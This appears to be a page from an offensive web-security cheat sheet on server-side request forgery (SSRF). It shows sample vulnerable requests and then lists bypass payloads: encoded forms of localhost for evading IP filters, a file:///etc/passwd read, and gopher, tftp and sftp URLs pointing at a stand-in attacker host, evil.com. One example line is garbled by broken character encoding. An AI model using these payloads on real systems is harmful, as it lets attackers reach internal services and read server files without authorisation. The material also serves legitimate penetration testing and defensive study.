Elite

SSRF

Usually, it can be found in the request that contain request to another url, for example like this

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

or

GET /image?url=http://192.168.1.1/
Host: example.com

How to exploit

  1. Basic payload

http://127.0.0.1:1337
http://localhost:1337

  1. Hex encoding

http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1

  1. Octal encoding

http://127.0.0.1 -> http://0177.0.0.01

  1. Dword encoding

http://127.0.0.1 -> http://2130706433

  1. Mixed encoding

http://127.0.0.1 -> http://0177.0.0.0x1

  1. Using URL encoding

http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74

  1. Using IPv6

http://0000::1:1337/
http://[::]:1337/

  1. Using bubble text

http://โ“”โ“งโ“โ“œโ“Ÿโ“›โ“”.โ“’โ“žโ“œ

Use this https://capitalizemytitle.com/bubble-text-generator/

How to exploit (URI Scheme)

  1. File scheme

file:///etc/passwd

  1. Dict scheme

dict://127.0.0.1:1337/

  1. FTP scheme

ftp://127.0.0.1/

  1. TFTP scheme

tftp://evil.com:1337/test

  1. SFTP scheme

sftp://evil.com:1337/test

  1. LDAP scheme

ldap://127.0.0.1:1337/

  1. Gopher scheme

gopher://evil.com/_Test%0ASSRF
PreviousSQL injectionNextWeb Cache Deception

Last updated